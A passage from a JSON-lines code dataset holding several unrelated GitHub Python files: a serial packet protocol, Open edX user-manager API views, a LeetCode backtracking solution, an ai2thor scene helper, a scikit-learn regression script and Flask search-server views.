self.target_board_id, self.pt_str[PACKET_TYPE_REPLY], self.pid, packets_cnt))\r\n                \r\n                self.ser.write(packet)\r\n\r\n                if (packets_cnt <= 0):\r\n                    self.send_state = SEND_PACKET_STATE_QUIT\r\n\r\n                self.send_state = SEND_PACKET_STATE_WAIT_ACK\r\n                continue\r\n\r\n            if (self.send_state == SEND_PACKET_STATE_WAIT_ACK):\r\n                print(\"station go into state SEND_PACKET_STATE_WAIT_ACK\")\r\n                packet = self.ser.read(PACKET_LEN)\r\n                if (len(packet) < PACKET_LEN):\r\n                    continue\r\n\r\n                board_id, packet_type, pid, packet_seq = struct.unpack(\"4B\", packet[: PACKET_OFFSET_SEQ+1])\r\n                print(\"station receive ACK, packet len %d, board_id %d, packet_type %d, pid %d, packet_seq %d\"\r\n                      %(len(packet), board_id, packet_type, pid, packet_seq))\r\n                \r\n                if (board_id != self.my_board_id or packet_type != PACKET_TYPE_ACK):\r\n                    print (\"received packet len %d, board_id %d, packet type %d, expected board_id %d, packet_type: %s\"\r\n                           %(len(packet), board_id, packet_type, self.my_board_id, self.pt_str[PACKET_TYPE_ACK]))\r\n                    \r\n                    self.send_state = SEND_PACKET_STATE_QUIT\r\n                    continue\r\n\r\n                print (\"send packet cnt %d\" %(send_packet_cnt))\r\n                if (send_packet_cnt == packets_cnt):\r\n                    print(\"station send %d packets done\" %(send_packet_cnt))\r\n                    \r\n                    self.send_packet_done = True\r\n                    return True\r\n\r\n                self.send_state = SEND_PACKET_STATE_SEND\r\n                continue\r\n\r\n            if (self.send_state == SEND_PACKET_STATE_SEND):\r\n                print(\"station go into state SEND_PACKET_STATE_SEND\")\r\n                packet = struct.pack(\"4B\", self.target_board_id, PACKET_TYPE_DATA, self.pid, _packet_seq)\r\n                if (send_packet_cnt != packets_cnt - 1):\r\n                    crc_str = CRC_LEN * '\\0'\r\n                    msg = sendfile.read(PACKET_DATA_LEN)\r\n                    #print (\"#station sen len %d, msg:%s\" %(len(msg), msg))\r\n                    packet = packet + msg + crc_str\r\n                else:\r\n                    packet = packet + sendfile.read(last_packet_size) + (PACKET_LEN - len(packet) - last_packet_size) * '\\0'\r\n\r\n                self.ser.write(packet)\r\n\r\n                print(\"station send data, len %d, target_board_id %d, type %s, pid %d, seq %d\"\r\n                      %(len(packet), self.target_board_id, self.pt_str[PACKET_TYPE_DATA], pid, _packet_seq))\r\n                \r\n                self.total_send_bytes += len(packet)\r\n                send_packet_cnt += 1\r\n                _packet_seq += 1\r\n\r\n                self.send_state = SEND_PACKET_STATE_WAIT_ACK\r\n                continue\r\n\r\n            if (self.send_state == SEND_PACKET_STATE_QUIT):\r\n                print(\"station go into state SEND_PACKET_STATE_QUIT\")\r\n                print (\"station_send_packet thread exit...\")\r\n                return False\r\n\r\n    def send_bytes(self):\r\n        return self.total_send_bytes\r\n\r\n    def send_packet_is_done(self):\r\n        return self.send_packet_done\r\n\r\n    \r\n\r\ndef receive_packet_thread(xock):\r\n    return xock.receive_packet()\r\n\r\ndef request_packet(port, target_board_id, board_id, pid):\r\n    \r\n    if not port:\r\n        port = \"/dev/ttyUSB0\"\r\n    \r\n    xock = xocket(port, baudrate = 115200, target_board_id = target_board_id, pid = pid,\r\n                  my_board_id = board_id)\r\n    \r\n    thread.start_new_thread(receive_packet_thread, (xock,))\r\n    cur_time = time.time()\r\n    while time.time() < cur_time + 20.0:\r\n        time.sleep(0.01)\r\n        if (xock.receive_packet_is_done()):\r\n            time_interval = time.time() - cur_time\r\n            received_bytes = xock.received_bytes()\r\n            print(\"receive %d bytes in %.3f\" %(received_bytes, time_interval))\r\n            print(\"speed: %.2fKB/s\" %((received_bytes/1000)/time_interval))\r\n            print(\"\\r\\nreceive packet done ok\\r\\n\")\r\n            return True\r\n\r\n    print (\"receive packet timeout...\")\r\n    return False\r\n    \r\n    \r\ndef send_packet_thread(xock, file_name, pid):\r\n    return xock.send_packet(file_name, 
pid)\r\n\r\ndef reply_packet(port, target_board_id, board_id, send_file_name):\r\n\r\n    if not port:\r\n        port = \"/dev/ttyUSB0\"\r\n    \r\n    xock = xocket(dev = port, baudrate = 115200, target_board_id = target_board_id,\r\n                  my_board_id = board_id)\r\n\r\n    while True:\r\n        print(\"waiting for request packet\")\r\n        \r\n        packet = xock.ser.read(PACKET_LEN)\r\n        if (len(packet) < PACKET_LEN):\r\n            continue\r\n\r\n        if (xock.is_request_packet(packet)):\r\n            board_id, packet_type, pid = struct.unpack(\"3B\", packet[:PACKET_OFFSET_PID+1])\r\n            thread.start_new_thread(send_packet_thread, (xock, send_file_name, pid)) \r\n            cur_time = time.time()\r\n            wait_delay = 20.0\r\n            while time.time() < cur_time + wait_delay:\r\n                time.sleep(0.01)\r\n                if (xock.send_packet_is_done()):\r\n                    time_interval = time.time() - cur_time\r\n                    send_bytes = xock.send_bytes()\r\n                    print(\"send %d bytes in %.3f\" %(send_bytes, time_interval))\r\n                    print(\"speed: %.2fKB/s\" %((send_bytes/1000)/time_interval))\r\n                    print(\"\\r\\n send packet done ok\\r\\n\")\r\n                    break\r\n            \r\n            if (time.time() >= cur_time + wait_delay):\r\n                print (\"send packet timeout...\")\r\n            \r\n\r\n\r\n\r\n","repo_name":"eastmoutain/python_serial_protocol","sub_path":"xocket.py","file_name":"xocket.py","file_ext":"py","file_size_in_byte":18497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33398766898","text":"\"\"\"\nViews for User Manager Application.\n\"\"\"\nfrom __future__ import absolute_import, unicode_literals\n\nfrom rest_framework import status\nfrom rest_framework.exceptions import NotFound\nfrom rest_framework.generics import ListAPIView, ListCreateAPIView\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom ...models import UserManagerRole\nfrom .serializers import ManagerListSerializer, ManagerReportsSerializer, UserManagerSerializer\n\n\ndef _filter_by_manager_id_or_email(queryset, identifier):\n    \"\"\"\n    Filters provided ``queryset`` by ``manager_id``.\n    Here ``manager_id`` can be a username or email address.\n\n    Args:\n        queryset(QuerySet): UserManagerRole queryset\n        identifier(str): username or email address of manager\n    Returns:\n        queryset filtered by manager\n    \"\"\"\n\n    if identifier is None:\n        return queryset\n    elif '@' in identifier:\n        return queryset.filter(\n            Q(manager_user__email=identifier) | Q(unregistered_manager_email=identifier),\n        )\n    else:\n        return queryset.filter(\n            manager_user__username=identifier,\n        )\n\n\ndef _filter_by_user_id_or_email(queryset, identifier):\n    \"\"\"\n    Filter ``queryset`` by ``identifier``, where ``identifier`` can be a username or email address.\n\n    Args:\n        queryset(QuerySet): UserManagerRole queryset\n        identifier(str): username or email address of user\n    Returns:\n        queryset filtered by user\n    \"\"\"\n\n    if identifier is None:\n        return queryset\n    elif '@' in identifier:\n        return queryset.filter(user__email=identifier)\n    else:\n        return queryset.filter(user__username=identifier)\n\n\nclass ManagerViewMixin(object):\n    \"\"\"\n    Provide common functionality for all manager views.\n    \"\"\"\n\n    permission_classes = (IsAuthenticated,)\n\n    @property\n    def authentication_classes(self):  # pragma: no cover\n        \"\"\"\n        Allow users authenticated via OAuth2 or normal session authentication.\n        \"\"\"\n        from openedx.core.lib.api import authentication  # pylint: disable=import-error\n        return [\n            
authentication.OAuth2AuthenticationAllowInactiveUser,\n            authentication.SessionAuthenticationAllowInactiveUser,\n        ]\n\n\nclass ManagerListView(ManagerViewMixin, ListAPIView):\n    \"\"\"\n    **Use Case**\n\n        * Get a list of all users that are managers for other users\n\n    **Get Request**\n\n        GET /api/user_manager/v1/managers/\n\n    **GET Parameters**\n\n        None\n\n    **GET Response**\n\n        If the request for information about the managers is successful, an HTTP 200 \"OK\"\n        response is returned with a collection of managers.\n\n        The HTTP 200 response has the following values.\n\n        * count: The number of managers in a course.\n\n        * next: The URI to the next page of results.\n\n        * previous: The URI to the previous page of results.\n\n        * num_pages: The number of pages.\n\n        * results: a list of manager users:\n\n            * id: The user id for a manager user, or null if manager doesn't have an\n              account yet.\n\n            * email: Email address of manager.\n\n    **Get Response Example**\n\n    ::\n\n        {\n            \"count\": 99,\n            \"next\": \"https://courses.example.com/api/user_manager/v1/managers/?page=2\",\n            \"previous\": null,\n            \"results\": {\n                {\n                    \"email\": \"staff@example.com\",\n                    \"username\": \"staff\"\n                },\n                { ... }\n            }\n        }\n    \"\"\"\n\n    serializer_class = ManagerListSerializer\n    queryset = UserManagerRole.objects.values(\n        'manager_user__username',\n        'manager_user__email',\n        'unregistered_manager_email',\n    ).distinct()\n\n\nclass ManagerReportsListView(ManagerViewMixin, ListCreateAPIView):\n    \"\"\"\n    **Use Cases**\n\n        * Get a list of all users that are reports for the provided manager.\n\n        * Add a user as a report under a manager.\n\n        * Remove a user or all users under a manager.\n\n    **GET Request**\n\n    ::\n\n        GET /api/user_manager/v1/managers/{user_id}/reports/\n\n    **GET Parameters**\n\n        * user_id: username or email address for user whose reports you want to fetch\n\n    **GET Response**\n\n        GET /api/user_manager/v1/managers/{user_id}/reports/\n\n        If the request for information about the managers is successful, an HTTP 200 \"OK\"\n        response is returned with a collection of managers.\n\n        The HTTP 200 response has the following values.\n\n        * count: The number of managers in a course.\n\n        * next: The URI to the next page of results.\n\n        * previous: The URI to the previous page of results.\n\n        * num_pages: The number of pages.\n\n        * results: a list of users under a manager:\n\n            * username: The username for a user.\n\n            * email: Email address of user.\n\n    **GET Response Example**\n\n    ::\n\n        GET /api/user_manager/v1/reports/edx@example.com/reports/\n\n        {\n            \"count\": 99,\n            \"next\": \"https://courses.example.com/api/user_manager/v1/reports/edx@example.com/reports/?page=2\",\n            \"previous\": null,\n            \"results\": {\n                {\n                    \"email\": \"staff@example.com\",\n                    \"username\": \"staff\"\n                },\n                { ... 
}\n            }\n        }\n\n\n    **POST Request**\n\n    ::\n\n        POST /api/user_manager/v1/managers/{user_id}/reports/ {\n            \"email\": \"{email}\"\n        }\n\n    **POST Parameters**\n\n        * user_id: username or email address for user for whom you want to add a manager\n\n        * email: Email address for a user\n\n    **POST Response Example**\n\n    ::\n\n        POST /api/user_manager/v1/reports/edx@example.com/reports/ {\n            \"email\": \"user@email.com\"\n        }\n\n        {\n            \"email\": \"user@email.com\",\n            \"username\": \"user\"\n        }\n\n    **Delete Requests**\n\n    ::\n\n        DELETE /api/user_manager/v1/managers/{user_id}/reports/\n\n        DELETE /api/user_manager/v1/managers/{user_id}/reports/?user={user_id}\n\n    **DELETE Parameters**\n\n        * user_id: username or email address for user\n    \"\"\"\n\n    serializer_class = ManagerReportsSerializer\n\n    def get_queryset(self):\n        \"\"\"\n        Return queryset with username filter.\n        \"\"\"\n\n        username = self.kwargs['username']\n        return _filter_by_manager_id_or_email(UserManagerRole.objects, username)\n\n    def perform_create(self, serializer):\n        \"\"\"\n        Use serializer to create ``UserManagerRole`` object using provided data.\n        \"\"\"\n\n        manager_id = self.kwargs['username']\n        email = serializer.validated_data.get('user', {}).get('email')\n\n        try:\n            user = User.objects.get(email=email)\n        except User.DoesNotExist:\n            raise NotFound(detail='No user with that email')\n\n        if '@' in manager_id:\n            try:\n                manager_user = User.objects.get(email=manager_id)\n            except User.DoesNotExist:\n                serializer.save(user=user, unregistered_manager_email=manager_id)\n                return\n        else:\n            manager_user = User.objects.get(username=manager_id)\n\n        serializer.save(manager_user=manager_user, user=user)\n\n    def delete(self, request, *args, **kwargs):  # pylint: disable=unused-argument\n        \"\"\"\n        Delete one or all reports for provided manager.\n        \"\"\"\n\n        user = request.query_params.get('user')\n        queryset = _filter_by_user_id_or_email(self.get_queryset(), user)\n        queryset.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserManagerListView(ManagerViewMixin, ListCreateAPIView):\n    \"\"\"\n    **Use Cases**\n\n        * Get a list of the managers that a user directly reports to.\n\n        * Add a manager for a user.\n\n        * Remove all managers for a user, or remove a single manager for a user.\n\n    **GET Request**\n\n    ::\n\n        GET /api/user_manager/v1/users/{user_id}/managers/\n\n    **GET Parameters**\n\n        * user_id: username or email address for user whose managers you want to fetch\n\n    **GET Response Values**\n\n        If the request for information about the managers is successful, an HTTP 200 \"OK\"\n        response is returned with a collection of managers.\n\n        The HTTP 200 response has the following values.\n\n        * count: The number of managers in a course.\n\n        * next: The URI to the next page of results.\n\n        * previous: The URI to the previous page of results.\n\n        * num_pages: The number of pages.\n\n        * results: a list of managers directly over a user:\n\n            * username: The username for a manager (may be null if manager hasn't\n              registered an account).\n\n            * email: Email address of manager.\n\n    **GET Response Example**\n\n    ::\n\n        GET /api/user_manager/v1/users/staff@example.com/managers/\n\n        {\n            \"count\": 99,\n            \"next\": \"https://courses.example.com/api/user_manager/v1/users/staff@example.com/managers/?page=2\",\n            \"previous\": null,\n            \"results\": {\n                {\n                    \"email\": \"edx@example.com\",\n                    \"username\": \"edx\"\n                },\n                { ... 
}\n            }\n        }\n\n    **POST Request**\n\n    ::\n\n        POST /api/user_manager/v1/users/{user_id}/managers/ {\n            \"email\": \"{email}\"\n        }\n\n    **POST Parameters**\n\n        * user_id: username or email address for user for whom you want to add a manager\n\n        * email: Email address for the manager\n\n    **POST Response Example**\n\n    ::\n\n        POST /api/user_manager/v1/users/edx@example.com/managers/ {\n            \"email\": \"user@email.com\"\n        }\n\n        {\n            \"email\": \"user@email.com\",\n            \"username\": \"user\"\n        }\n\n    **DELETE Requests**\n\n    ::\n\n        DELETE /api/user_manager/v1/users/{user_id}/managers/\n\n        DELETE /api/user_manager/v1/users/{user_id}/managers/?user={user_id}\n\n\n    **DELETE Parameters**\n\n        * user_id: username or email address for manager\n    \"\"\"\n\n    serializer_class = UserManagerSerializer\n\n    @staticmethod\n    def _get_user_by_username_or_email(identifier):\n        \"\"\"\n        Get user by identifier, which could be an email or username.\n        \"\"\"\n\n        if '@' in identifier:\n            return User.objects.get(email=identifier)\n        else:\n            return User.objects.get(username=identifier)\n\n    def get_queryset(self):\n        \"\"\"\n        Get queryset filtered by username.\n        \"\"\"\n\n        username = self.kwargs['username']\n        return _filter_by_user_id_or_email(UserManagerRole.objects, username)\n\n    def perform_create(self, serializer):\n        \"\"\"\n        Use serializer to create ``UserManagerRole`` object using provided data.\n        \"\"\"\n\n        try:\n            user = self._get_user_by_username_or_email(self.kwargs['username'])\n        except User.DoesNotExist:\n            raise NotFound(detail='No user with that email')\n\n        manager_email = serializer.validated_data.get('manager_email')\n\n        try:\n            manager = User.objects.get(email=manager_email)\n            serializer.save(manager_user=manager, user=user)\n        except User.DoesNotExist:\n            serializer.save(unregistered_manager_email=manager_email, user=user)\n\n    def delete(self, request, *args, **kwargs):  # pylint: disable=unused-argument\n        \"\"\"\n        Delete all managers for the supplied user.\n        \"\"\"\n\n        manager = request.query_params.get('manager')\n        queryset = _filter_by_manager_id_or_email(self.get_queryset(), manager)\n        queryset.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"open-craft/openedx-user-manager-api","sub_path":"user_manager/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27782482682","text":"from typing import List\n\n\nclass Solution:\n    def makesquare(self, ms: List[int]) -> bool:\n        def solve(ms, square, pos, side):\n            print(f\"solve({ms}, {square}, {pos}, {side})\")\n            if pos >= len(ms):\n                return all(ss == side for ss in square)\n            \n            for i in range(4):\n                if ms[pos] + square[i] <= side:\n                    square[i] += ms[pos]\n                    if solve(ms, square, pos+1, side):\n                        return True\n                    else:\n                        square[i] -= ms[pos]\n\n            return False\n\n        perimeter = sum(ms)\n        if perimeter % 4 != 0:\n            return False\n        side = perimeter // 4\n        ms.sort(reverse=True)\n        return solve(ms, [0]*4, 0, side)\n\n\nif __name__ == '__main__':\n    import os\n    import testcases.utils as utils\n    testcases = utils.extract_testcases(__file__)\n    utils.execute_tests(testcases, Solution, 'makesquare')\n","repo_name":"manimanis/Competitive_Programming","sub_path":"leetcode/d20210615/solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32694403887","text":"from ai2thor.controller import Controller\nimport 
copy\n\nvisibilityDistance = 1 #Visibility distance of agent (m)\n\nclass TypeNameHandler:\n def __init__(self) -> None:\n self.typingDict = dict()\n \n def generate_name(self, typeName: str) -> None:\n if typeName in self.typingDict.keys():\n self.typingDict[typeName][\"n\"] += 1\n else:\n self.typingDict[typeName] = {\"n\" : 1}\n\n return str(str.lower(typeName)+str(self.typingDict[typeName][\"n\"]))\n\nclass Object:\n\n typeNameHandler = TypeNameHandler()\n\n def __init__(self,fields: dict) -> None:\n if fields is not None:\n self.metadata = fields\n else:\n self.metadata = dict()\n\n def update(self, fields: dict):\n self.metadata.update(fields)\n \n def fromScene(self, objMetadata):\n if objMetadata is not None:\n \n #Take a copy of the original metadata\n metadata = copy.deepcopy(objMetadata)\n\n #Update some fields for compatability \n metadata.update({\n 'name': self.typeNameHandler.generate_name(objMetadata[\"objectType\"]),\n 'id': objMetadata[\"objectId\"],\n 'type': str.lower(objMetadata[\"objectType\"]),\n 'interactable': objMetadata[\"visible\"], #assumed to be interactable when seen\n 'position': (objMetadata[\"position\"][\"x\"], objMetadata[\"position\"][\"y\"], objMetadata[\"position\"][\"z\"]),\n 'temperature': Scene.temperatureNumericValue(objMetadata[\"temperature\"]),\n })\n\n #Clean some unwanted fields\n metadata.pop(\"objectType\", None)\n metadata.pop(\"objectTemperature\", None)\n metadata.pop(\"objectId\", None)\n else:\n metadata = dict()\n\n self.metadata = metadata\n \n\nclass Scene:\n '''Fetches important information about the scene in terms of pddl model'''\n\n def __init__(self, controller: Controller) -> None:\n '''Gets an event object of the current scene'''\n self.controller = controller\n self.objects, self.visibleObjects, self.holding = self.getObjectsState(self.controller)\n \n def getObjectsState(self, controller):\n '''Returns a dictionary of all objects in the scene, their types and other properties'''\n\n event = controller.step(action=\"Done\")\n\n listObj = []\n listVisible = []\n heldObject = None\n \n for obj in event.metadata[\"objects\"]:\n currObj = Object(fields=None)\n currObj.fromScene(obj)\n listObj.append(currObj)\n\n if currObj.metadata[\"isPickedUp\"]:\n heldObject = currObj.metadata[\"name\"]\n \n if currObj.metadata[\"visible\"]:\n listVisible.append(currObj.metadata[\"name\"])\n \n return listObj, listVisible, heldObject\n\n @staticmethod\n def temperatureNumericValue(tmp_str):\n if tmp_str == 'Cold':\n return 0\n if tmp_str == 'RoomTemp':\n return 1\n if tmp_str == 'Hot':\n return 2\n \n\n # def checkObjectReachability(self, obj):\n # corners = obj[\"objectOrientedBoundingBox\"]\n # return ((corners in self.reachablePositions) and obj[\"visible\"])\n\n \n\n\n\n \n\n \n\n","repo_name":"roymatza/Robochef","sub_path":"scene_info.py","file_name":"scene_info.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39321850999","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSupervised Machine Learning Exercise using Scikit Learn\r\n\r\n\"\"\"\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom copy import deepcopy\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.svm import 
SVR\r\nfrom sklearn.multioutput import MultiOutputRegressor\r\n\r\nimport pickle\r\n\r\n#Input variables\r\nn_params = 10\r\nn_objectives = 1\r\n\r\n#Set the file path\r\nfilePath = \"C:\\\\Users\\\\harri\\\\OneDrive\\\\Documents\\\\ITECH2020\\\\Academic Materials\\\\21_Som Sem\\\\3064044_Computing in Architecture\\\\2_Assignments\\\\_Final\\\\_Final Logs\\\\Supervised ML\\\\SOO\\\\\"\r\nfileName = \"dataset.csv\"\r\n\r\n#Read the file\r\ndataset = pd.read_csv(filePath + fileName)\r\nprint(dataset.head())\r\n\r\n#Analyze the features using histogram\r\n#dataset.hist()\r\n#plt.show()\r\n\r\n#Create a separate dataset for parameters\r\nparameters_dataset = deepcopy(dataset)\r\nfor i in range(n_objectives):\r\n    parameters_dataset.drop(parameters_dataset.columns[-1], axis=1, inplace=True)\r\n\r\nprint(parameters_dataset.head())\r\n\r\n#Create a separate dataset for objectives\r\nobjectives_dataset = deepcopy(dataset)\r\nfor i in range(n_params):\r\n    objectives_dataset.drop(objectives_dataset.columns[0], axis=1, inplace=True)\r\n\r\nprint(objectives_dataset.head())\r\n\r\n# perform a standard scaler transform of the parameters dataset\r\nsc = StandardScaler()\r\nstd_params_data = sc.fit_transform(parameters_dataset)\r\nstd_parameters_dataset = pd.DataFrame(std_params_data)\r\nstd_parameters_dataset.columns = parameters_dataset.columns\r\n\r\n#Save the standard scaler model\r\npickle.dump(sc, open(filePath + 'scaler_model.pkl','wb'))\r\n\r\n\r\n#std_parameters_dataset.hist()\r\n#plt.show()\r\n\r\nprint(std_parameters_dataset.head())\r\n\r\n# Split data for training and testing\r\nX_train, X_test, Y_train, Y_test = train_test_split(std_parameters_dataset, objectives_dataset, test_size=0.33, random_state=5)\r\n\r\n######### Polynomial Linear Regression #########\r\n#Transform the parameters by adding polynomial features\r\npoly = PolynomialFeatures(degree=2)\r\nX_poly = poly.fit_transform(X_train)\r\npoly.fit(X_poly, Y_train)\r\n\r\n#Do the regression\r\nreg_model = LinearRegression()\r\nreg_model.fit(X_poly, Y_train)\r\n\r\n#Evaluate the polynomial linear regression model with a cross validation\r\ncv_score_1 = cross_val_score(reg_model, X_poly, Y_train, cv=10).mean()\r\n\r\n#Test the model on the held-out data\r\nY_predict_poly = reg_model.predict(poly.fit_transform(X_test))\r\n\r\n\r\n######### Support Vector Regression #########\r\nsvr_model = SVR(kernel='poly', degree=2)\r\nmulti_svr_model = MultiOutputRegressor(svr_model)\r\nmulti_svr_model.fit(X_train, Y_train)\r\n\r\n#Evaluate the multi-output support vector regression model with a cross validation\r\ncv_score_2 = cross_val_score(multi_svr_model, X_train, Y_train, cv=10).mean()\r\n\r\n#Test the model on the held-out data\r\nY_predict_svr = multi_svr_model.predict(X_test)\r\n\r\n#Save the pretrained model with the best accuracy\r\nmodel_fileName = 'prediction_model.pkl'\r\npickle.dump(reg_model, open(filePath + model_fileName, 'wb'))","repo_name":"mengxihe/a_block_problem","sub_path":"Python Files/training_and_validation.py","file_name":"training_and_validation.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36397896358","text":"from functools import wraps\nimport logging\n\nfrom flask import abort\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import make_response\nfrom flask import request\nfrom flask import Response\nfrom flask import url_for\nfrom flask.views import MethodView\nfrom peewee import *\nfrom 
playhouse.flask_utils import get_object_or_404\nfrom playhouse.flask_utils import PaginatedQuery\nfrom werkzeug.exceptions import NotFound\n\nfrom scout.constants import PROTECTED_KEYS\nfrom scout.constants import RANKING_CHOICES\nfrom scout.constants import SEARCH_BM25\nfrom scout.exceptions import error\nfrom scout.models import database\nfrom scout.models import Attachment\nfrom scout.models import BlobData\nfrom scout.models import Document\nfrom scout.models import Index\nfrom scout.models import IndexDocument\nfrom scout.models import Metadata\nfrom scout.search import DocumentSearch\nfrom scout.serializers import AttachmentSerializer\nfrom scout.serializers import DocumentSerializer\nfrom scout.serializers import IndexSerializer\nfrom scout.validator import RequestValidator\n\n\nattachment_serializer = AttachmentSerializer()\ndocument_serializer = DocumentSerializer()\nindex_serializer = IndexSerializer()\n\nengine = DocumentSearch()\nvalidator = RequestValidator()\n\nlogger = logging.getLogger('scout')\n\n\ndef register_views(app):\n prefix = app.config.get('URL_PREFIX') or ''\n if prefix:\n prefix = '/%s' % prefix.strip('/')\n\n # Register views and request handlers.\n index_view = IndexView(app)\n index_view.register('index_view', '%s/' % prefix)\n\n document_view = DocumentView(app)\n document_view.register('document_view', '%s/documents/' % prefix)\n\n attachment_view = AttachmentView(app)\n attachment_view.register(\n 'attachment_view',\n '%s/documents//attachments/' % prefix,\n 'path')\n app.add_url_rule(\n '%s/documents//attachments//download/' % prefix,\n view_func=authentication(app)(attachment_download))\n\n\ndef authentication(app):\n def decorator(fn):\n @wraps(fn)\n def inner(*args, **kwargs):\n api_key = app.config.get('AUTHENTICATION')\n if not api_key:\n return fn(*args, **kwargs)\n\n # Check headers and request.args for `key=`.\n key = request.headers.get('key') or request.args.get('key')\n if key != api_key:\n logger.info('Authentication failure for key: %s', key)\n return 'Invalid API key', 401\n else:\n return fn(*args, **kwargs)\n return inner\n return decorator\n\n\nclass ScoutView(object):\n def __init__(self, app):\n self.app = app\n self.paginate_by = app.config.get('PAGINATE_BY') or 50\n\n def register(self, name, url, pk_type=None):\n auth = authentication(self.app)\n base_views = (\n (self.list_view, 'GET', name),\n (self.create, 'POST', name + '_create'))\n\n for view, method, view_name in base_views:\n self.app.add_url_rule(url, view_name, view_func=auth(view),\n methods=[method])\n\n if pk_type is None:\n detail_url = url + '/'\n else:\n detail_url = url + '<%s:pk>/' % pk_type\n name += '_detail'\n\n detail_views = (\n (self.detail, ['GET'], name),\n (self.update, ['POST', 'PUT'], name + '_update'),\n (self.delete, ['DELETE'], name + '_delete'))\n\n for view, methods, view_name in detail_views:\n self.app.add_url_rule(detail_url, view_name, view_func=auth(view),\n methods=methods)\n\n def paginated_query(self, query, paginate_by=None):\n return PaginatedQuery(\n query,\n paginate_by=paginate_by or self.paginate_by,\n check_bounds=False)\n\n def detail(self):\n raise NotImplementedError\n\n def list_view(self):\n raise NotImplementedError\n\n def create(self):\n raise NotImplementedError\n\n def update(self):\n raise NotImplementedError\n\n def delete(self):\n raise NotImplementedError\n\n def _search_response(self, index, allow_blank, document_count):\n ranking = request.args.get('ranking') or SEARCH_BM25\n if ranking not in RANKING_CHOICES:\n 
error('Unrecognized \"ranking\" value. Valid options are %s' %\n ', '.join(RANKING_CHOICES))\n\n ordering = request.args.getlist('ordering')\n filters = validator.extract_get_params()\n\n q = request.args.get('q', '').strip()\n if not q and not allow_blank:\n error('Search term is required.')\n\n query = engine.search(q or '*', index, ranking, ordering, **filters)\n pq = self.paginated_query(query)\n\n response = {\n 'document_count': document_count,\n 'documents': document_serializer.serialize_query(\n pq.get_object_list(),\n include_score=True if q else False),\n 'filtered_count': query.count(),\n 'filters': filters,\n 'ordering': ordering,\n 'page': pq.get_page(),\n 'pages': pq.get_page_count(),\n }\n if q:\n response.update(\n ranking=ranking,\n search_term=q)\n return response\n\n#\n# Views.\n#\n\nclass IndexView(ScoutView):\n def detail(self, pk):\n index = get_object_or_404(Index, Index.name == pk)\n document_count = index.documents.count()\n response = {'name': index.name, 'id': index.id}\n response.update(self._search_response(index, True, document_count))\n return jsonify(response)\n\n def list_view(self):\n query = (Index\n .select(\n Index,\n fn.COUNT(IndexDocument.id).alias('document_count'))\n .join(IndexDocument, JOIN.LEFT_OUTER)\n .group_by(Index))\n\n ordering = request.args.getlist('ordering')\n query = engine.apply_sorting(query, ordering, {\n 'name': Index.name,\n 'document_count': SQL('document_count'),\n 'id': Index.id}, 'name')\n\n pq = self.paginated_query(query)\n return jsonify({\n 'indexes': [index_serializer.serialize(index)\n for index in pq.get_object_list()],\n 'ordering': ordering,\n 'page': pq.get_page(),\n 'pages': pq.get_page_count()})\n\n def create(self):\n data = validator.parse_post(['name'])\n\n with database.atomic():\n try:\n index = Index.create(name=data['name'])\n except IntegrityError:\n error('\"%s\" already exists.' % data['name'])\n else:\n logger.info('Created new index \"%s\"' % index.name)\n\n return self.detail(index.name)\n\n def update(self, pk):\n index = get_object_or_404(Index, Index.name == pk)\n data = validator.parse_post(['name'])\n index.name = data['name']\n\n with database.atomic():\n try:\n index.save()\n except IntegrityError:\n error('\"%s\" is already in use.' 
% index.name)\n else:\n logger.info('Updated index \"%s\"' % index.name)\n\n return self.detail(index.name)\n\n def delete(self, pk):\n index = get_object_or_404(Index, Index.name == pk)\n\n with database.atomic():\n ndocs = (IndexDocument\n .delete()\n .where(IndexDocument.index == index)\n .execute())\n index.delete_instance()\n\n logger.info('Deleted index \"%s\" and unlinked %s associated documents.',\n index.name, ndocs)\n\n return jsonify({'success': True})\n\n\nclass _FileProcessingView(ScoutView):\n def _get_document(self, pk):\n if isinstance(pk, int) or (pk and pk.isdigit()):\n query = Document.all().where(Document._meta.primary_key == pk)\n try:\n return query.get()\n except Document.DoesNotExist:\n pass\n return get_object_or_404(Document.all(), Document.identifier == pk)\n\n def attach_files(self, document):\n attachments = []\n for identifier in request.files:\n file_obj = request.files[identifier]\n attachments.append(\n document.attach(file_obj.filename, file_obj.read()))\n logger.info('Attached %s to document id = %s',\n file_obj.filename, document.get_id())\n return attachments\n\n\nclass DocumentView(_FileProcessingView):\n def detail(self, pk):\n document = self._get_document(pk)\n return jsonify(document_serializer.serialize(document))\n\n def list_view(self):\n # Allow filtering by index.\n idx_list = request.args.getlist('index')\n if idx_list:\n indexes = Index.select(Index.id).where(Index.name << idx_list)\n else:\n indexes = None\n\n document_count = Document.select().count()\n return jsonify(self._search_response(indexes, True, document_count))\n\n def create(self):\n data = validator.parse_post(\n ['content'],\n ['identifier', 'index', 'indexes', 'metadata'])\n\n indexes = validator.validate_indexes(data)\n if indexes is None:\n error('You must specify either an \"index\" or \"indexes\".')\n\n if data.get('identifier'):\n try:\n document = self._get_document(data['identifier'])\n except NotFound:\n pass\n else:\n return self.update(data['identifier'])\n\n document = Document.create(\n content=data['content'],\n identifier=data.get('identifier'))\n\n if data.get('metadata'):\n 